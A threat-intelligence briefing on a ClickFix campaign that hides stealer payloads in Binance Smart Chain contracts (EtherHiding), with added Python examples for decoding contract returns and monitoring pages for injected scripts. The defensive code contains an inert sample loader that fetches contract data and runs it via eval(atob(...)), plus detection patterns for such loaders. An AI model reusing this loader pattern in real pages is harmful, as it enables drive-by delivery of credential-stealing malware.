Briefing

A multi-stage campaign built around the ‘ClickFix’ social-engineering lure is actively targeting Web3 users by injecting malicious JavaScript into compromised, otherwise legitimate websites. The end result is the theft of credentials and wallet private keys by commodity information stealers such as AMOS (macOS) and Vidar (Windows), which leads directly to wallet draining. The campaign gets its stealth and resilience from the “EtherHiding” technique: the next-stage payload is stored in the state of four separate smart contracts deployed on the Binance Smart Chain, where anyone can read it but only the contract owner can change or remove it.


Context

The threat landscape has seen a marked increase in supply-chain attacks in which a threat actor compromises a trusted third-party service and uses it to inject malicious code into front-end interfaces. This campaign exploits the trust users place in legitimate websites and the fact that very few security controls inspect data held in on-chain contract state. Because the payload is fetched from the blockchain network with read-only calls rather than from a dedicated malware-delivery domain, it slips past the network-level tools that rely on blocking known-bad hosts.


Analysis

The attack chain starts when a user visits a compromised website. The injected JavaScript displays a fake CAPTCHA check, the ‘ClickFix’ lure, whose “fix” instructions trick the user into executing the attacker's command themselves. The script then performs the “EtherHiding” step: it queries a set of four smart contracts on the Binance Smart Chain and retrieves a Base64-encoded payload from contract state. These are read-only calls (no gas is spent and no transaction is recorded), so the retrieval leaves nothing on the ledger for defenders to trace. A critical “gate contract” controls delivery: by changing its on-chain state, the threat actor can switch the whole campaign on or off without touching any of the compromised sites.

The decoded payload ultimately serves an OS-specific stealer (AMOS on macOS, Vidar on Windows) that harvests credentials and private keys. Using blockchain state as command-and-control infrastructure makes the payload highly resistant to takedown: nobody but the contract owner can alter or remove it, while the owner can update it at will, so the operator keeps both persistence and agility.
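To make the on-chain half of the chain concrete, here is an added example (my own code, not from the article or from the campaign's tooling). It builds the JSON-RPC `eth_call` a loader sends, ABI-decodes a `string` return the way a payload-storage contract would hand it back, unwraps the Base64 and looks for script content, and decodes a gate-contract flag. Every input is constructed: the contract address is a zero-filled placeholder, the calldata is empty where a real loader would send a function selector, and the “payload” is an inert snippet pointing at `example.invalid`.

```python
"""Added example: decoding what an EtherHiding-style loader gets back from eth_call.

Constructed data only; no network access. The payload string is an inert placeholder,
not the campaign's code, and the contract address is a placeholder, not a real one.
"""
import base64
import json
import re

PLACEHOLDER_CONTRACT = "0x" + "00" * 20   # placeholder, not a real address
PLACEHOLDER_CALLDATA = "0x"               # a real loader sends an ABI function selector here


def build_eth_call(contract: str, calldata: str) -> dict:
    """JSON-RPC request shape a loader uses to read contract state.

    eth_call is read-only: no gas, no signed transaction, nothing recorded on-chain,
    so the payload retrieval leaves no ledger trace for defenders."""
    return {"jsonrpc": "2.0", "id": 1, "method": "eth_call",
            "params": [{"to": contract, "data": calldata}, "latest"]}


def abi_encode_string(s: bytes) -> str:
    """ABI-encode a single dynamic `string`/`bytes` return value (test-data helper)."""
    head = (32).to_bytes(32, "big")            # offset of the dynamic part
    length = len(s).to_bytes(32, "big")
    padded = s + b"\x00" * (-len(s) % 32)      # right-pad data to a 32-byte boundary
    return "0x" + (head + length + padded).hex()


def abi_decode_string(result_hex: str) -> bytes:
    """Decode an ABI `string` return: 32-byte offset, 32-byte length, then the data."""
    data = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    offset = int.from_bytes(data[:32], "big")
    length = int.from_bytes(data[offset:offset + 32], "big")
    return data[offset + 32:offset + 32 + length]


def gate_enabled(result_hex: str) -> bool:
    """Decode a `bool`/`uint256` gate flag: the loader proceeds only when it is non-zero."""
    data = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    return int.from_bytes(data[:32], "big") != 0


_B64 = re.compile(rb"[A-Za-z0-9+/]+={0,2}")
# Strings a browser-side loader commonly carries (heuristics for triage, not a signature).
SCRIPT_MARKERS = [b"document.createElement(", b"appendChild(", b"eval(", b"Function(",
                  b"atob(", b"fetch(", b"navigator.clipboard"]


def analyse_eth_call_result(result_hex: str) -> dict:
    """Decode a payload-contract return, strip Base64 if present, and look for script content."""
    raw = abi_decode_string(result_hex)
    report = {"raw_len": len(raw), "base64": False, "markers": []}
    blob = raw
    if _B64.fullmatch(raw) and len(raw) % 4 == 0:
        try:
            blob = base64.b64decode(raw, validate=True)
            report["base64"] = True
        except ValueError:
            pass
    report["markers"] = [m.decode() for m in SCRIPT_MARKERS if m in blob]
    report["suspicious"] = report["base64"] and bool(report["markers"])
    return report


# Constructed sample: an inert loader-like string, Base64-encoded and then ABI-encoded
# the way a storage contract would return it. example.invalid never resolves.
SAMPLE_LOADER_JS = (b"var s=document.createElement('script');"
                    b"s.src='https://example.invalid/stage2.js';document.head.appendChild(s);")
SAMPLE_PAYLOAD_RESPONSE = abi_encode_string(base64.b64encode(SAMPLE_LOADER_JS))
GATE_ON = "0x" + "00" * 31 + "01"   # constructed gate return: campaign enabled
GATE_OFF = "0x" + "00" * 32         # constructed gate return: campaign paused

if __name__ == "__main__":
    print(json.dumps(build_eth_call(PLACEHOLDER_CONTRACT, PLACEHOLDER_CALLDATA)))
    print("gate on:", gate_enabled(GATE_ON), "gate off:", gate_enabled(GATE_OFF))
    print(json.dumps(analyse_eth_call_result(SAMPLE_PAYLOAD_RESPONSE), indent=2))
```

The same decoding applies when pulling suspected storage contracts' return values out of your own RPC logs or from a chain explorer: ABI-decode, check for Base64, decode, and inspect the result as code rather than as data. The gate check matters for forensics too: a contract whose flag reads zero today may have read one during the incident window.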


Parameters

  • Payload Storage and Delivery → Four smart contracts on the Binance Smart Chain, read by the injected script with read-only calls.
  • Infection Method → Malicious JavaScript injected into compromised, legitimate websites; fake CAPTCHA (‘ClickFix’) lure.
  • Payload Stealers → AMOS (macOS) and Vidar (Windows) information-stealer families.
  • Control Mechanism → On-chain state change in a “gate contract” that toggles delivery for the whole campaign.


Outlook

Immediate mitigation for Web3 users: treat any unexpected CAPTCHA, “verification” step or wallet-signing request as hostile, however legitimate the host website appears, and never paste or run a command that a web page asks you to execute. For site operators and protocols, the incident raises the bar: monitor the integrity of first- and third-party scripts served to users continuously (the injection lives in the page itself, so a new or changed inline script is the earliest signal), and restrict where page scripts may connect so that an injected loader cannot reach blockchain RPC endpoints the site has no business calling. Defenders will also need on-chain forensic tooling that recognises contracts used for payload storage. Using blockchain state for C2 is cheap and reliable, so other threat actors will adopt it; detection must shift from network-level blocking toward analysis of page content and on-chain data.
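The script-integrity monitoring the Outlook calls for can start small. Below is an added example (my own code, not from the article or any vendor tool) that baselines the scripts a page serves, reports scripts that appear or disappear, and scores newly added inline scripts against indicators of an EtherHiding-style loader. The HTML, the injected snippet and its zero-filled contract address are constructed for the demo; `bsc-dataseed.binance.org` is one of the public BNB Smart Chain RPC hosts and stands in for whatever endpoint list a real monitor would carry.

```python
"""Added example: baseline the scripts a page serves and flag new ones that look like an
on-chain payload loader. Everything here is constructed for the demo; no network access."""
import hashlib
import re
from html.parser import HTMLParser


class _ScriptCollector(HTMLParser):
    """Collects every <script> element: its src attribute (if any) and its inline body."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.scripts = []
        self._in_script = False
        self._src = None
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script, self._src, self._buf = True, dict(attrs).get("src"), []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append({"src": self._src, "body": "".join(self._buf).strip()})


def extract_scripts(html: str) -> list:
    parser = _ScriptCollector()
    parser.feed(html)
    parser.close()
    return parser.scripts


def fingerprint(script: dict) -> str:
    """External scripts are keyed by URL here; a production monitor must also fetch and hash
    the file, because an attacker who swaps the body behind an unchanged URL must be caught."""
    key = script["src"] if script["src"] else script["body"]
    return hashlib.sha256(key.encode()).hexdigest()


# Heuristic indicators of an on-chain payload loader. The names are this example's own.
INDICATORS = {
    "bsc_public_rpc": re.compile(r"bsc-dataseed\d*\.binance\.org", re.I),  # public BSC RPC hosts
    "json_rpc_eth_call": re.compile(r"\beth_call\b"),                        # read-only contract query
    "evm_address": re.compile(r"0x[0-9a-fA-F]{40}\b"),                       # hard-coded contract
    "base64_decode": re.compile(r"\batob\s*\("),                             # Base64 payload unwrap
    "dynamic_eval": re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),        # payload execution
    "clipboard_write": re.compile(r"navigator\.clipboard\.writeText"),       # ClickFix copy-to-clipboard
}


def flag_indicators(body: str) -> list:
    return sorted(name for name, rx in INDICATORS.items() if rx.search(body))


def diff_scripts(baseline_html: str, current_html: str) -> dict:
    """Compare the current page against the baseline. A modified inline script shows up as
    one removed plus one added entry; only added scripts are scored for indicators."""
    base = {fingerprint(s): s for s in extract_scripts(baseline_html)}
    cur = {fingerprint(s): s for s in extract_scripts(current_html)}
    added = [cur[k] for k in cur if k not in base]
    removed = [base[k] for k in base if k not in cur]
    findings = [{"src": s["src"], "indicators": flag_indicators(s["body"])} for s in added]
    return {"added": added, "removed": removed, "findings": findings}


# Constructed pages. The injected script is inert: zero address, empty calldata, never executed.
BASELINE_HTML = """<html><head>
<script src="/static/app.js"></script>
<script>window.siteVersion = "2.1";</script>
</head><body><p>Swap tokens here.</p></body></html>"""

INJECTED_SCRIPT = """<script>
(async () => {
  const rpc = "https://bsc-dataseed.binance.org/";
  const req = {jsonrpc: "2.0", id: 1, method: "eth_call",
               params: [{to: "0x0000000000000000000000000000000000000000", data: "0x"}, "latest"]};
  const r = await fetch(rpc, {method: "POST", body: JSON.stringify(req)});
  eval(atob((await r.json()).result));
})();
</script>"""

COMPROMISED_HTML = BASELINE_HTML.replace("</head>", INJECTED_SCRIPT + "\n</head>")

if __name__ == "__main__":
    report = diff_scripts(BASELINE_HTML, COMPROMISED_HTML)
    for f in report["findings"]:
        print("new script", f["src"] or "(inline)", "indicators:", ", ".join(f["indicators"]))
```

Run this from a scheduled job against the served HTML (not the files on disk, since the injection may happen at render time) and page on any added script, with the indicator list deciding how loudly. Legitimate dApp front-ends do talk to RPC endpoints, so the `bsc_public_rpc` and `evm_address` hits alone are weak evidence; `atob` feeding `eval` in a script that was not there yesterday is the combination worth waking someone for.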


Verdict

This EtherHiding campaign marks a significant escalation in Web3 attack sophistication: threat actors are successfully using a public blockchain's tamper-resistant, always-available state as command-and-control infrastructure that defenders can observe but cannot take down.

supply chain attack, malicious JavaScript injection, on-chain payload delivery, smart contract obfuscation, credential stealer malware, private key theft, wallet draining scam, social engineering lure, Base64 encoded payload, Binance Smart Chain, gate contract logic, multi-stage infection, Web3 security threat, front-end compromise, remote code execution, OS-specific malware

Signal Acquired from → thehackernews.com

Micro Crypto News Feeds

wallet draining

Definition ∞ Wallet Draining is the unauthorised transfer of the assets in a victim's crypto wallet, typically after the attacker obtains the private key or seed phrase, or tricks the victim into signing a malicious transaction.

supply chain

Definition ∞ A supply chain is the network of individuals, companies, resources and technologies involved in creating and delivering a product. In security the term usually means the software supply chain: the third-party components, services and scripts a product or website depends on, any one of which, once compromised, reaches every downstream user.

smart chain

Definition ∞ “Smart Chain” here refers to BNB Smart Chain (formerly Binance Smart Chain), an EVM-compatible blockchain that executes smart contracts and hosts decentralized applications.

private keys

Definition ∞ Private keys are the secret values that authorise transactions from a blockchain address. Whoever holds the key controls the assets, and a stolen key cannot be revoked, so its theft means the wallet can be drained.

javascript injection

Definition ∞ JavaScript Injection is an attack in which an adversary inserts their own JavaScript into the pages a website serves, so that it runs in every visitor's browser with the site's privileges.

malware

Definition ∞ Malware is malicious software designed to infiltrate and damage computer systems or steal sensitive information.

contract

Definition ∞ A 'Contract' (smart contract) is code deployed on a blockchain that executes when called. Its state is publicly readable, and only the contract's own logic, typically at the direction of its owner, can change it.

on-chain

Definition ∞ On-chain refers to transactions and data recorded on a blockchain ledger. They are publicly readable by anyone with node access; past records cannot be altered, although contract storage can be updated by new transactions.

web3

Definition ∞ Web3 represents the conceptual evolution of the internet, aiming for a decentralized architecture built upon blockchain technology and distributed ledger systems.